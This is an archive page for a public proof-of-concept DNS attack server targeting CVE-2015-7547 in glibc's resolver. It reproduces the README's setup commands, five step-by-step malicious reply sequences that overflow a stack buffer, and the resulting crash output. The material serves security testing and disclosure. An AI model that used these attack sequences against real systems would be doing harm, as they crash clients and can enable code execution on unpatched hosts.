Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-7547 PoC — GNU C Library 缓冲区错误漏洞

Source
https://github.com/eSentire/cve-2015-7547-public
Associated Vulnerability
Title:GNU C Library 缓冲区错误漏洞 (CVE-2015-7547)
Description:GNU C Library(glibc,libc6)是一种按照LGPL许可协议发布的开源免费的C语言编译程序。 GNU C Library 2.23之前版本存在缓冲区错误漏洞。攻击者利用该漏洞导致系统拒绝服务(崩溃)或通过特制的DNS响应触发任意代码。
Description
PoC attack server for CVE-2015-7547 buffer overflow vulnerability in glibc DNS stub resolver (public version)
Readme
# PoC attack server for CVE-2015-7547 vulnerability in glibc DNS stub resolver

To test on local machine with a vulnerable glibc version:

```
user@localhost:/$ echo 'nameserver 127.0.0.127' | sudo tee /etc/resolv.conf
user@localhost:/$ echo 'nameserver 127.0.0.127' | sudo tee -a /etc/resolv.conf
user@localhost:/$ sudo python3 attack-server.py 127.0.0.127
Starting UDP server on 127.0.0.127:53...
Starting TCP server on 127.0.0.127:53...
```

Then, from another terminal session, execute the attacks as shown in the examples below.

## Attack 1 (UDP+TCP)

Needs ability to send replies > 2048 bytes over UDP and TCP.

Attack Sequence:

1. UDP reply, > 2048 bytes, valid header/question, TC flag set (triggers buffer mismanagement and TCP retry)

2. TCP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

3. TCP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack1
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 2 (UDP only)

Needs ability to send replies > 2048 bytes over UDP.

Attack Sequence:

1. UDP reply, > 2048 bytes, invalid header (triggers buffer mismanagement, not counted as a valid response)

2. Ignore next request (triggers UDP retry due to polling timeout)

3. UDP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. UDP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack2
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 3 (UDP+TCP)

Needs ability to send replies > 1024 bytes over UDP and > 2048 bytes over TCP.

Attack Sequence:

1. UDP reply, 1024 bytes, valid header/question (fills up half of the stack-allocated buffer)

2. UDP reply, > 1024 bytes, valid header/question, TC flag set (triggers buffer mismanagement and TCP retry)

3. TCP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. TCP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack3
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 4 (UDP only)

Needs ability to send replies > 2048 bytes over UDP.

Attack Sequence:

1. UDP reply, 2048 bytes, valid header/question (fills up the stack-allocated buffer)

2. UDP reply (triggers buffer mismanagement and UDP retry due to 0-byte socket receive)

3. UDP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. UDP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack4
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Attack 5 (TCP only)

Needs ability to send replies > 2048 bytes over TCP and at least two nameserver entries in `/etc/resolv.conf`.

Attack Sequence:

0. UDP reply, valid header/question, TC flag set (optional, triggers TCP retry if initial query is over UDP)

1. TCP reply, > 2048 bytes (triggers buffer mismanagement)

2. TCP reply, empty (triggers TCP retry due to 0-byte socket receive)

3. TCP reply, valid header/question (forces next reply to be stored in stack-allocated buffer)

4. TCP reply, > 2048 bytes (overflows stack-allocated buffer)

Example:

```
user@localhost:/$ curl http://attack5
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
```

## Payload Tests

To trigger a valid type A/AAAA reply of a certain size from the server, send a request for one of the following:

* payload1 (> 64 bytes)
* payload2 (> 128 bytes)
* payload3 (> 256 bytes)
* payload4 (> 512 bytes)
* payload5 (> 1024 bytes)
* payload6 (> 2048 bytes)
* payload7 (> 4096 bytes)
* payload8 (> 8192 bytes)

The requests can be issued over UDP or TCP, and the responses will contain the appropriate number of valid A or AAAA answers to pad the reply to the requested size.  When the PoC server is set up as the authoritative name server for a test domain, this allows for exploring the behaviour of DNS cache hierarchies when faced with oversized replies.

Example:

```
user@localhost:/$ curl http://payload1.somedomain.com
```
File Snapshot

 [4.0K]  /data/pocs/80ea11b531708265db147f2ef22d4e39367c0e2c
├── [ 14K]  attack-server.py
├── [ 14K]  dnsutil.py
└── [4.2K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.